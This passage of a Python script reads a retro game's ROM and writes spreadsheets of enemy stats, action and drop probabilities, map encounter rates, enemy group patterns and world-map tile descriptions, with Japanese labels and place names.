cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"パラパきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"パラパ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n for i in range(_MAX_ACTIONS_PER_ENEMY):\n header_row.append(_ColumnStyle(caption=f\"敵行動{i + 1}\"))\n header_row.append(_ColumnStyle(caption=f\"敵行動{i + 1}_確率\", cell_alignment=_RIGHT_ALIGNMENT))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム1\"))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム2\"))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム確率\", cell_alignment=_RIGHT_ALIGNMENT))\n header_row.append(_ColumnStyle(caption=\"備考\"))\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"C2\"\n choriki_endurance = {\n 0: \"100%\",\n 1: \"70%\",\n 2: \"30%\",\n 3: \"0%\",\n }\n debuff_endurance = {\n 0: \"100%\",\n 1: \"70%\",\n 2: \"30%\",\n 3: \"0%\",\n }\n tern_bucket = {\n 0: \"2 or 3\",\n 1: \"4 or 5\",\n 2: \"5 or 6\",\n }\n escapable = {\n True: \"可能\",\n False: \"不可\",\n }\n attack_twice = {\n True: \"1 or 2\",\n False: \"1\",\n }\n hittability = {\n 0: 0xC0,\n 1: 0xA0,\n 2: 0x80,\n 3: 0,\n }\n mihagito_endurance = {\n True: \"0%\",\n False: \"40%\",\n }\n kurusu_endurance = {\n True: \"0%\",\n False: \"20%\",\n }\n beto_endurance = {\n True: \"0%\",\n False: \"40%\",\n }\n note_by_enemy_id = {\n 0x78: \"プレイヤーの行動選択後のターン開始時に命の上位バイトが#$7Fに上書きされる。(ターン開始時に命が32513(#$7F01)以上に回復する)\", # エイりアンドー\n }\n rows = []\n for enemy_id in range(1, _ENEMY_ID_COUNT + 1):\n enemy = _get_enemy(prg_rom_bytes, enemy_id)\n enemy_name = _get_enemy_name(prg_rom_bytes, enemy_id)\n mahuuji_endurance = debuff_endurance[enemy.mahuuji_endurance]\n if enemy.mahuuji_endurance == 3:\n assert enemy.mahuuji_effectiveness == 0\n mahuuji_tern_count = \"-\"\n else:\n mahuuji_tern_count = tern_bucket[enemy.mahuuji_effectiveness]\n lullaby_endurance = debuff_endurance[enemy.lullaby_endurance]\n if enemy.lullaby_endurance == 3:\n assert enemy.lullaby_effectiveness == 0\n lullaby_tern_count = \"-\"\n else:\n lullaby_tern_count = tern_bucket[enemy.lullaby_effectiveness]\n parapa_endurance = debuff_endurance[enemy.parapa_endurance]\n if enemy.parapa_endurance == 3:\n assert enemy.parapa_effectiveness == 0\n parapa_tern_count = \"-\"\n else:\n parapa_tern_count = tern_bucket[enemy.parapa_effectiveness]\n row = [\n enemy_id,\n enemy_name.enemy_name.strip(),\n _get_chapter_name_of_enemy(enemy_id),\n enemy.hp,\n enemy.min_hp,\n enemy.max_hp,\n enemy.cp,\n enemy.attack,\n enemy.defense,\n enemy.speed,\n enemy.money,\n enemy.experience,\n escapable[enemy.escapable],\n attack_twice[enemy.attack_twice],\n hittability[enemy.hittability],\n mihagito_endurance[enemy.mihagito_endurance],\n kurusu_endurance[enemy.kurusu_endurance],\n beto_endurance[enemy.beto_endurance],\n choriki_endurance[enemy.choriki_endurance_1],\n choriki_endurance[enemy.choriki_endurance_2],\n choriki_endurance[enemy.choriki_endurance_3_4],\n choriki_endurance[enemy.choriki_endurance_5],\n choriki_endurance[enemy.choriki_endurance_6],\n mahuuji_endurance,\n mahuuji_tern_count,\n lullaby_endurance,\n lullaby_tern_count,\n parapa_endurance,\n parapa_tern_count,\n ]\n enemy_action_pattern = _get_enemy_action_pattern(prg_rom_bytes, enemy.action_pattern_id)\n action_threshold_by_action_id = _aggregate_enemy_action_pattern(enemy_action_pattern)\n sorted_actions = sorted(action_threshold_by_action_id.items(), key=operator.itemgetter(1), reverse=True)\n for i in range(_MAX_ACTIONS_PER_ENEMY):\n if i < len(sorted_actions):\n (action_id, threshold) = sorted_actions[i]\n action_name = _get_action_name(prg_rom_bytes, action_id).action_name.strip()\n row.append(action_name)\n row.append(f\"{round(threshold / (0x100 * 2) * 100, 2):.02f}% ({threshold} / {0x100 * 2})\")\n else:\n row.append(\"-\")\n row.append(\"-\")\n item_drop_pattern = _get_item_drop_pattern(prg_rom_bytes, enemy.item_drop_pattern_id)\n has_drop_item = False\n if item_drop_pattern.drop_item_id_0 == 0:\n row.append(\"-\")\n else:\n has_drop_item = True\n row.append(_get_item_name(prg_rom_bytes, item_drop_pattern.drop_item_id_0).item_name.strip())\n if item_drop_pattern.drop_item_id_1 == 0:\n assert not has_drop_item\n row.append(\"-\")\n else:\n assert has_drop_item\n has_drop_item = True\n row.append(_get_item_name(prg_rom_bytes, item_drop_pattern.drop_item_id_1).item_name.strip())\n if not has_drop_item:\n row.append(\"-\")\n elif item_drop_pattern.item_drop_threshold == 0:\n row.append(\"100.00%\")\n else:\n row.append(f\"{round(item_drop_pattern.item_drop_threshold / 0x100 * 100, 2):.02f}% ({item_drop_pattern.item_drop_threshold} / {0x100})\")\n row.append(note_by_enemy_id.get(enemy_id, \"-\"))\n rows.append(row)\n\n def _get_sort_key(row: List[Any]) -> Tuple[int, int]:\n enemy_id = row[0]\n enemy_chapter_priority = [\n \"1の巻\",\n \"2の巻\",\n \"3の巻\",\n \"4の巻\",\n \"5の巻\",\n \"6の巻\",\n \"7の巻\",\n \"8の巻\",\n \"9の巻\",\n \"10の巻\",\n \"オニガランド\",\n \"オーロラ王国\",\n \"ボス\",\n \"不明\",\n ].index(row[2])\n return (enemy_chapter_priority, enemy_id)\n\n for row in sorted(rows, key=_get_sort_key):\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _get_encounter_threshold(prg_rom_bytes: bytes, encounter_threshold_id: int) -> int:\n assert 0 <= encounter_threshold_id <= 7\n if encounter_threshold_id == 0:\n return 0\n return prg_rom_bytes[0x00FD7D + (encounter_threshold_id - 1)]\n\n\ndef _fill_map(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n description_by_map_id = {\n 0x0000: \"ワールドマップ\",\n 0x0001: \"オニガランドワールドマップ\",\n 0x0002: \"オーロラ王国ワールドマップ\",\n 0x0004: \"柳生の里\",\n 0x0008: \"尾張の町:奉行所1階\",\n 0x0009: \"尾張の町:奉行所地下牢\",\n 0x0025: \"アザラシ村とゆきおとこ村の間の洞窟\",\n 0x0026: \"オーロラ村とアザラシ村の間の洞窟2\",\n 0x0028: \"浪速の都:越後屋への地下通路(左から右)\",\n 0x002A: \"なまず大明神:入り口の社\",\n 0x002B: \"なまず大明神:おおなまずのフロア\",\n 0x002C: \"からくり城:1階\",\n 0x002E: \"からくり城:地下1階牢屋\",\n 0x0030: \"柳生の里(江戸の町崩壊後)\",\n 0x0031: \"からくり城:入り口の細い通路\",\n 0x0035: \"柳生の里:但馬邸(江戸の町崩壊後)\",\n 0x003A: \"シードラゴン:縦に長い階段があるフロア\",\n 0x003B: \"シードラゴン:最下層(水の流れているフロア)\",\n 0x003C: \"シードラゴン:一番上の層の右の部屋・3番目の層の右の部屋(何も無い部屋)\",\n 0x003D: \"シードラゴン:乙姫の前の人が7人いる部屋\",\n 0x003E: \"シードラゴン:たつのこつかいのフロアの1つ前の宝箱が6個ある部屋\",\n 0x003F: \"シードラゴン:うつぼうずのフロア\",\n 0x0040: \"龍宮からシードラゴンへの通路1\",\n 0x0041: \"シードラゴン:入ってすぐのフロア\",\n 0x0042: \"シードラゴン:最下層からうつぼうずの途中の部屋1\",\n 0x0043: \"龍宮\",\n 0x0044: \"シードラゴン:たつのこつかいのいる部屋\",\n 0x0045: \"シードラゴン:一番上の層の左の部屋・2番目の層の左の部屋(たるが2個ある部屋)\",\n 0x0047: \"シードラゴン:2番目の層の真ん中の部屋・3番目の層の左の部屋(たるが5個ある部屋)\",\n 0x0048: \"シードラゴン:2番目の層の右の部屋(うつぼのカギがある部屋)\",\n 0x004A: \"龍宮からシードラゴンへの通路2\",\n 0x004C: \"シードラゴン:最下層からうつぼうずの途中の部屋2\",\n 0x004D: \"シードラゴン:最下層からうつぼうずの途中の部屋3\",\n 0x004E: \"シードラゴン:最下層からうつぼうずの途中の部屋4\",\n 0x004F: \"シードラゴン:最下層からうつぼうずの途中の部屋5\",\n 0x0050: \"火炎城:フロア1(火炎城最初のフロア)\",\n 0x0051: \"暗闇城:地下4階(こうもりだゆうのフロア)\",\n 0x0053: \"龍の祠(さばのすけで龍宮の入り口を見つけるフロア)\",\n 0x0054: \"のろい城:2階\",\n 0x0056: \"火炎城:フロア2\",\n 0x0058: \"火炎城:フロア3\",\n 0x0059: \"火炎城:フロア4(横1列のフロア)\",\n 0x005A: \"氷結城:左の塔4階\",\n 0x005B: \"氷結城:右の塔4階\",\n 0x005C: \"イワンのだっしゅつ\",\n 0x005D: \"龍宮への入り口の次の真っ黒のフロア(じゅうべえ落下)\",\n 0x005F: \"シードラゴン:乙姫の部屋\",\n 0x0060: \"火炎城:フロア5\",\n 0x0061: \"暗闇城:地下1階(入ってすぐのフロア)\",\n 0x0062: \"暗闇城:地下2階\",\n 0x0063: \"暗闇城:地下3階(牢屋)\",\n 0x0064: \"暗闇城:地下2階(ヘルバットのフロア)\",\n 0x0065: \"浪速の都(からくり城攻略前の暗い状態)\",\n 0x0067: \"浪速の都:越後屋からからくり城への地下通路(下から上)\",\n 0x0068: \"飢餓城:1階\",\n 0x006B: \"浪速の都:���後屋\",\n 0x006E: \"飢餓城:2階\",\n 0x006F: \"飢餓城:3階(スフインツクのフロア)\",\n 0x0070: \"飢餓城:地下1階\",\n 0x0071: \"飢餓城:3階\",\n 0x0072: \"飢餓城:3階(ビッグカンカンからスフインツクの間の通路)\",\n 0x0073: \"飢餓城:4階(ツタンだいおうのフロア)\",\n 0x0074: \"飢餓城:ビッグカンカンのフロア\",\n 0x0076: \"氷結城:左の塔2階\",\n 0x0077: \"氷結城:左の塔3階\",\n 0x007B: \"氷結城:5階(メガトンコインを持っていると落ちてしまうところ)\",\n 0x007C: \"氷結城:だるまたいしのいるフロア\",\n 0x007D: \"氷結城:右の塔1階\",\n 0x007E: \"氷結城:右の塔3階\",\n 0x0083: \"かぶとがに大明神:入り口の社\",\n 0x0084: \"かぶとがに大明神:内部\",\n 0x0085: \"安芸の町\",\n 0x0086: \"伊予の町\",\n 0x0088: \"伊予の町から土佐の町への地下道\",\n 0x0089: \"宇宙(タコリアンのUFOでの移動画面)\",\n 0x008A: \"つちのこ大明神\",\n 0x008B: \"土佐の町(シードラゴン攻略前)\",\n 0x008D: \"のろい城:地下1階\",\n 0x008E: \"のろい城:1階(入ってすぐのフロア)\",\n 0x008F: \"のろい城:1階\",\n 0x0090: \"のろい城:3階(棺桶が多いフロア)・4階\",\n 0x0091: \"のろい城:5階(ゾンビまおうのフロア)\",\n 0x0092: \"のろい城:3階(牢屋のあるフロア)\",\n 0x0094: \"のろい城:ゾンビマシン\",\n 0x0097: \"岬の小屋(さばのすけのいるフロア)\",\n 0x0098: \"呉別府の渡し\",\n 0x0099: \"異人の町\",\n 0x009A: \"隼人の渡し\",\n 0x00A2: \"モンゴレンの町:あおいほんがあるフロア\",\n 0x00A5: \"オーロラ村とアザラシ村の間の洞窟1\",\n 0x00A6: \"黄金洞窟\",\n 0x00A8: \"ゆきおとこ村北のガンちゃんで岩を退けるフロア\",\n 0x00A9: \"浪速の都:越後屋の隠し通路部屋\",\n 0x00AC: \"未来城:左の塔上層1階\",\n 0x00AD: \"未来城:右の塔上層(最下層へ落下させられるフロア)\",\n 0x00AF: \"隠れ湯\",\n 0x00B0: \"富士山への地下通路\",\n 0x00B8: \"未来城:パームロケットが貰える部屋\",\n 0x00BD: \"ミロクの洞窟\",\n 0x00BE: \"未来城:外観(入ってすぐのフロア)\",\n 0x00C0: \"未来城:格納庫(床下パネルを調べながら進むフロアの途中にある上下に入り口のある部屋)\",\n 0x00C4: \"未来城:左の塔下層(左の塔入ってすぐのフロア)\",\n 0x00C5: \"未来城:左の塔最上階(ボスガンダー1のフロア)\",\n 0x00C9: \"未来城:中央の橋(パームロケットを使うフロア)\",\n 0x00CA: \"未来城:右の塔(上層から最下層への落下画面)\",\n 0x00CB: \"未来城:右の塔最下層(ボスガンダー2のフロア)\",\n 0x00CF: \"未来城:格納庫(ドールのカギを使い入ってすぐのフロア)\",\n 0x00D6: \"未来城:格納庫(床下パネルを調べながら進むフロア)\",\n 0x00DC: \"未来城:中央の塔(マインマスターのフロア)\",\n 0x00E0: \"未来城:中央の塔(マインマスターのフロアのひとつ前のフロア)\",\n 0x00E1: \"モモタロゾンビの城1階\",\n 0x00E2: \"モモタロゾンビの城2階\",\n 0x00E3: \"モモタロゾンビの城3階\",\n 0x00E5: \"オーロラ村:王宮\",\n 0x00E6: \"未来城:左の塔上層2階\",\n 0x00E7: \"未来城:左の塔上層3階\",\n 0x00E8: \"未来城:左の塔上層4階\",\n 0x00E9: \"未来城:左の塔上層5階\",\n 0x00EA: \"未来城:右の塔最上階\",\n 0x00EB: \"未来城:右の塔最上階-1階\",\n 0x00EC: \"ゆきおとこ村からクーラーの洞窟の間の洞窟\",\n 0x00ED: \"ゆきおとこ村\",\n 0x00EE: \"北の洞窟:入ってすぐのフロア\",\n 0x00EF: \"北の洞窟:2番目のフロア\",\n 0x00F0: \"オーロラ村\",\n 0x00F1: \"モモタロゾンビの城4階\",\n 0x00F2: \"モモタロゾンビの城5階\",\n 0x00F3: \"クーラーの洞窟:入ってすぐのフロア\",\n 0x00F4: \"クーラーの洞窟:メタルブロックのいるフロア\",\n 0x00F5: \"隠れ湯:みかづきの部屋\",\n 0x00F6: \"薩摩の町(火炎城攻略前)\",\n 0x00F7: \"薩摩の町(かえんだいおう戦後)\",\n 0x00F8: \"薩摩の町(かえんだいおう潜伏時)\",\n 0x00FC: \"安芸の町:かごちゃんの部屋\",\n 0x00FD: \"琉球の村\",\n 0x00FE: \"琉球の村から火炎城への地下道\",\n 0x0100: \"屋久島\",\n 0x0101: \"屋久島:杉の子大明神\",\n 0x0102: \"壱岐(天狗のいるフロ���)\",\n 0x0103: \"オロ島(シロのいるフロア)\",\n 0x0104: \"門司の村\",\n 0x0105: \"門司の村:鬼の涙を使う穴がある部屋\",\n 0x0106: \"門司の村:鬼の涙を使うフロア\",\n 0x0107: \"下関の村\",\n 0x010A: \"黄泉の洞窟:入ってすぐのフロア\",\n 0x010C: \"黄泉の洞窟:エイリアンドール跡地\",\n 0x010D: \"カムカムの渡し\",\n 0x010E: \"黄泉の洞窟:タコリアンのいるフロア\",\n 0x010F: \"プーサンの村\",\n 0x0110: \"暗闇城から黄泉の洞窟への地下通路\",\n 0x0111: \"異星の廃都\",\n 0x0112: \"長門の村\",\n 0x0113: \"コンコンの町\",\n 0x0116: \"ホルクロア:まがつたまがあるフロア\",\n 0x0117: \"白ウサギ大明神\",\n 0x0118: \"ジャンパイの町\",\n 0x011A: \"ポキン\",\n 0x011C: \"クーロン城:入ってすぐのフロア\",\n 0x011D: \"クーロン城:地下牢\",\n 0x011E: \"クーロン城:コスモトロンがあるフロア\",\n 0x011F: \"ソウレンの村\",\n 0x0121: \"シーサンプータ\",\n 0x0122: \"三里の長城\",\n 0x0123: \"モンゴレンの町\",\n 0x0125: \"ハルビンタの村\",\n 0x0127: \"からくり城(ワールドマップから入った場合;入り口が無い)\",\n 0x0128: \"コウモリ洞窟(しんかげがあるフロア)\",\n 0x012A: \"ウラジョスト\",\n 0x012C: \"ババロフの町\",\n 0x012D: \"青い石碑(ノルンのなみだを使うフロア)\",\n 0x012E: \"最果ての洞窟(イワンの埋まっているフロア)\",\n 0x012F: \"石狩の町\",\n 0x0130: \"北の神々の祠\",\n 0x0131: \"まりもの里\",\n 0x0133: \"函館の村\",\n 0x0134: \"りんご村\",\n 0x0135: \"イタコ村\",\n 0x0137: \"十和田の石碑\",\n 0x0138: \"なんぶの町\",\n 0x013C: \"氷結城:入り口\",\n 0x013D: \"のろい城:入り口\",\n 0x013E: \"あきんどタウン\",\n 0x013F: \"ミミズク大明神\",\n 0x0140: \"いけない渡し\",\n 0x0142: \"あわの村\",\n 0x0143: \"江戸の町\",\n 0x0146: \"エンディング:マインマスター戦後のフロア\",\n 0x0147: \"シバレンの村\",\n 0x0148: \"のろい城:5階からゾンビマシンの間の移動\",\n 0x014D: \"千里の長城\",\n 0x014E: \"富士山\",\n 0x014F: \"ホルクロア\",\n 0x0150: \"薩摩の町の右下の火山\",\n 0x0152: \"しろくま村\",\n 0x0156: \"アザラシ村\",\n 0x0158: \"シロ編エンディングのスギ\",\n 0x0159: \"北の洞窟:ガンちゃんがいるフロア\",\n 0x015A: \"ミミナリ島の祠1階\",\n 0x015B: \"ミミナリ島の祠2階(キンタロゾンビのフロア)\",\n 0x015C: \"トンカチ島の祠(チューリップ)\",\n 0x015D: \"トンカチ島の祠(チューリップで転送後)\",\n }\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"マップID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マップ説明\"),\n _ColumnStyle(caption=\"敵グループパターンリストID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵エンカウント確率\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for map_id in range(0, _MAP_ID_COUNT):\n map_data = _get_map(prg_rom_bytes, map_id)\n if map_id in (0x00, 0x01, 0x02):\n # 0x00: ワールドマップ\n # 0x01: オニガランドワールドマップ\n # 0x02: オーロラ王国ワールドマップ\n encounter_rate = \"移動先のマスの種類により変わる\"\n else:\n encounter_threshold = _get_encounter_threshold(prg_rom_bytes, map_data.encounter_threshold_id)\n encounter_rate = f\"{round(encounter_threshold / 0x100 * 100, 2):.02f}% ({encounter_threshold} / {0x100})\"\n row = [map_id, description_by_map_id.get(map_id, \"\"), map_data.enemy_group_pattern_list_id, encounter_rate]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _aggregate_enemy_action_pattern_ids(enemy_group_pattern_ids: Sequence[int]) -> Sequence[Tuple[int, int]]:\n return tuple((enemy_group_pattern_id, len(tuple(ids))) for enemy_group_pattern_id, ids in itertools.groupby(sorted(enemy_group_pattern_ids)))\n\n\ndef _fill_enemy_group_pattern_list(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"敵グループパターンリストID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵グループパターンID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵グループパターンリスト内確率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵合計数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ1敵名前\"),\n _ColumnStyle(caption=\"グループ1敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ2敵名前\"),\n _ColumnStyle(caption=\"グループ2敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ3敵名前\"),\n _ColumnStyle(caption=\"グループ3敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for enemy_group_pattern_list_id in range(0, _ENEMY_GROUP_PATTERN_LIST_ID_COUNT):\n enemy_group_pattern_list = _get_enemy_group_pattern_list(prg_rom_bytes, enemy_group_pattern_list_id)\n enemy_group_pattern_ids_count = _aggregate_enemy_action_pattern_ids(enemy_group_pattern_list.enemy_group_pattern_ids)\n sum_enemy_group_pattern_ids_count = sum(item[1] for item in enemy_group_pattern_ids_count)\n if sum_enemy_group_pattern_ids_count:\n for enemy_group_pattern_id, count in enemy_group_pattern_ids_count:\n row: List[Union[int, str]] = [\n enemy_group_pattern_list_id,\n enemy_group_pattern_id,\n ]\n rate = f\"{round(count / sum_enemy_group_pattern_ids_count * 100, 2):.02f}% ({count} / {sum_enemy_group_pattern_ids_count})\"\n row.append(rate)\n enemy_group_pattern = _get_enemy_group_pattern(prg_rom_bytes, enemy_group_pattern_id)\n row.append(enemy_group_pattern.enemy_group_size)\n row.append(enemy_group_pattern.enemy_group_0_size + enemy_group_pattern.enemy_group_1_size + enemy_group_pattern.enemy_group_2_size)\n if enemy_group_pattern.enemy_group_0_enemy_id is not None:\n enemy_0_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_0_enemy_id).enemy_name.strip()\n row.append(enemy_0_name)\n row.append(enemy_group_pattern.enemy_group_0_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n if enemy_group_pattern.enemy_group_1_enemy_id is not None:\n enemy_1_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_1_enemy_id).enemy_name.strip()\n row.append(enemy_1_name)\n row.append(enemy_group_pattern.enemy_group_1_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n if enemy_group_pattern.enemy_group_2_enemy_id is not None:\n enemy_2_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_2_enemy_id).enemy_name.strip()\n row.append(enemy_2_name)\n row.append(enemy_group_pattern.enemy_group_2_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n else:\n # No group patterns in the list.\n row = [\n enemy_group_pattern_list_id,\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n ]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _fill_world_map(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n description_by_prg_rom_address = {\n 0x00FCE7: \"ワールドマップ(森(木2本))\",\n 0x00FCE8: \"ワールドマップ(森(木1本))\",\n 0x00FCE9: \"ワールドマップ(??)\",\n 0x00FCEA: \"ワールドマップ(雪木(木1本))\",\n 0x00FCEB: \"ワールドマップ(山(茶色))\",\n 0x00FCEC: \"ワールドマップ(岩山(1マス;進入不可))\",\n 0x00FCED: \"ワールドマップ(雪山(1マス;進入不可))\",\n 0x00FCEE: \"ワールドマップ(平野(緑))\",\n 0x00FCEF: \"ワールドマップ(橋(上から下))\",\n 0x00FCF0: \"ワールドマップ(海(左側が橋の影;進入不可))\",\n 0x00FCF1: \"ワールドマップ(橋(左から右))\",\n 0x00FCF2: \"ワールドマップ(海(上側が橋の影;進入不可))\",\n 0x00FCF3: \"ワールドマップ(沼(緑))\",\n 0x00FCF4: \"ワールドマップ(水(岸なし;進入不可))\",\n 0x00FCF5: \"ワールドマップ(水(上側が岸;進入不可))\",\n 0x00FCF6: \"ワールドマップ(水(上側と左側が岸;進入不可))\",\n 0x00FCF7: \"ワールドマップ(水(左側が岸;進入不可))\",\n 0x00FCF8: \"ワールドマップ(??)\",\n 0x00FCF9: \"ワールドマップ(水(下側が岸;進入不可))\",\n 0x00FCFA: \"ワールドマップ(水(左側と下側が岸;進入不可))\",\n 0x00FCFB: \"ワールドマップ(水(下側と右側が岸;進入不可))\",\n 0x00FCFC: \"ワールドマップ(??)\",\n 0x00FCFD: \"ワールドマップ(水(左側が岸;進入不可))\",\n 0x00FCFE: \"ワールドマップ(水(右側が岸;進入不可))\",\n 0x00FCFF: \"ワールドマップ(水(上側と下側が岸;進入不可))\",\n 0x00FD00: \"ワールドマップ(水(左側と右側が岸;進入不可))\",\n 0x00FD01: \"ワールドマップ(平野(緑;下側が岸))\",\n 0x00FD02: \"ワールドマップ(砂漠)\",\n 0x00FD03: \"ワールドマップ(??)\",\n 0x00FD04: \"ワールドマップ(ヤシの木)\",\n 0x00FD05: \"ワールドマップ(??)\",\n 0x00FD06: \"ワールドマップ(城壁(進入不可))\",\n 0x00FD07: \"ワールドマップ(スギ(2マスの上))\",\n 0x00FD08: \"ワールドマップ(雪原)\",\n 0x00FD09: \"ワールドマップ(スギ(2マスの下))\",\n 0x00FD0A: \"ワールドマップ(雪原(下側が岸))\",\n 0x00FD0B: \"ワールドマップ(岩山(2マスの左;進入不可))\",\n 0x00FD0C: \"ワールドマップ(岩山(2マスの右;進入不可))\",\n 0x00FD0D: \"ワールドマップ(町(2マス;左))\",\n 0x00FD0E: \"ワールドマップ(町(2マス;右))\",\n 0x00FD0F: \"ワールドマップ(洞窟(はしご))\",\n 0x00FD10: \"ワールドマップ(鳥居)\",\n 0x00FD11: \"ワールドマップ(町(1マス))\",\n 0x00FD12: \"ワールドマップ(氷結城(4マス;左上))\",\n 0x00FD13: \"ワールドマップ(氷結城(4マス;右上))\",\n 0x00FD14: \"ワールドマップ(氷結城(4マス;左下))\",\n 0x00FD15: \"ワールドマップ(氷結城(4マス;右下))\",\n 0x00FD16: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;左上))\",\n 0x00FD17: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;右上))\",\n 0x00FD18: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;左下))\",\n 0x00FD19: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;右下))\",\n 0x00FD1A: \"ワールドマップ(町跡地)\",\n 0x00FD1B: \"オニガランド(森(木1本))\",\n 0x00FD1C: \"オニガランド(??)\",\n 0x00FD1D: \"オニガランド(平野(茶))\",\n 0x00FD1E: \"オニガランド(森(幹無し))\",\n 0x00FD1F: \"オニガランド(森(木2本))\",\n 0x00FD20: \"オニガランド(平野(緑))\",\n 0x00FD21: \"オニガランド(??)\",\n 0x00FD22: \"オニガランド(??)\",\n 0x00FD23: \"オニガランド(??)\",\n 0x00FD24: \"オニガランド(??)\",\n 0x00FD25: \"オニガランド(??)\",\n 0x00FD26: \"オニガランド(水(岸なし))\",\n 0x00FD27: \"オニガランド(水(上側が岸))\",\n 0x00FD28: \"オニガランド(水(上側と左側が岸))\",\n 0x00FD29: \"オニガランド(水(上側と右側が岸))\",\n 0x00FD2A: \"オニガランド(??)\",\n 0x00FD2B: \"オニガランド(水(下側が岸))\",\n 0x00FD2C: \"オニガランド(水(左側と下側が岸))\",\n 0x00FD2D: \"オニガランド(水(下側と右側が岸))\",\n 0x00FD2E: \"オニガランド(??)\",\n 0x00FD2F: \"オニガランド(水(左側が岸))\",\n 0x00FD30: \"オニガランド(水(右側が岸))\",\n 0x00FD31: \"オニガランド(水(上側と下側が岸))\",\n 0x00FD32: \"オニガランド(水(左側と右側が岸))\",\n 0x00FD33: \"オニガランド(平野(茶;下側が岸))\",\n 0x00FD34: \"オニガランド(トゲ)\",\n 0x00FD35: \"オニガランド(溶岩)\",\n 0x00FD36: \"オニガランド(??)\",\n 0x00FD37: \"オニガランド(??)\",\n 0x00FD38: \"オニガランド(??)\",\n 0x00FD39: \"オニガランド(??)\",\n 0x00FD3A: \"オニガランド(??)\",\n 0x00FD3B: \"オニガランド(??)\",\n 0x00FD3C: \"オニガランド(??)\",\n 0x00FD3D: \"オニガランド(??)\",\n 0x00FD3E: \"オニガランド(??)\",\n 0x00FD3F: \"オニガランド(??)\",\n 0x00FD40: \"オニガランド(??)\",\n 0x00FD41: \"オニガランド(??)\",\n 0x00FD42: \"オニガランド(??)\",\n 0x00FD43: \"オニガランド(??)\",\n 0x00FD44: \"オニガランド(??)\",\n 0x00FD45: \"オニガランド(??)\",\n 0x00FD46: \"オニガランド(??)\",\n 0x00FD47: \"オニガランド(??)\",\n 0x00FD48: \"オニガランド(??)\",\n 0x00FD49: \"オニガランド(??)\",\n 0x00FD4A: \"オニガランド(??)\",\n 0x00FD4B: \"オニガランド(??)\",\n 0x00FD4C: \"オニガランド(??)\",\n 0x00FD4D: \"オニガランド(??)\",\n 0x00FD4E: \"オーロラ王国(雪原)\",\n 0x00FD4F: \"オーロラ王国(雪原(下側が岸))\",\n 0x00FD50: \"オーロラ王国(??)\",\n 0x00FD51: \"オーロラ王国(??)\",\n 0x00FD52: \"オーロラ王国(??)\",\n 0x00FD53: \"オーロラ王国(??)\",\n 0x00FD54: \"オーロラ王国(土)\",\n 0x00FD55: \"オーロラ王国(??)\",\n 0x00FD56: \"オーロラ王国(??)\",\n 0x00FD57: \"オーロラ王国(??)\",\n 0x00FD58: \"オーロラ王国(??)\",\n 0x00FD59: \"オーロラ王国(??)\",\n 0x00FD5A: \"オーロラ王国(??)\",\n 0x00FD5B: \"オーロラ王国(??)\",\n 0x00FD5C: \"オーロラ王国(??)\",\n 0x00FD5D: \"オーロラ王国(??)\",\n 0x00FD5E: \"オーロラ王国(??)\",\n 0x00FD5F: \"オーロラ王国(??)\",\n 0x00FD60: \"オーロラ王国(??)\",\n 0x00FD61: \"オーロラ王国(??)\",\n 0x00FD62: \"オーロラ王国(??)\",\n 0x00FD63: \"オーロラ王国(??)\",\n 0x00FD64: \"オーロラ王国(土(下側が岸))\",\n 0x00FD65: \"オーロラ王国(??)\",\n 0x00FD66: \"オーロラ王国(??)\",\n 0x00FD67: \"オーロラ王国(階段)\",\n 0x00FD68: \"オーロラ王国(??)\",\n 0x00FD69: \"オーロラ王国(??)\",\n 0x00FD6A: \"オーロラ王国(??)\",\n 0x00FD6B: \"オーロラ王国(??)\",\n 0x00FD6C: \"オーロラ王国(??)\",\n 0x00FD6D: \"オーロラ王国(??)\",\n 0x00FD6E: \"オーロラ王国(??)\",\n 0x00FD6F: 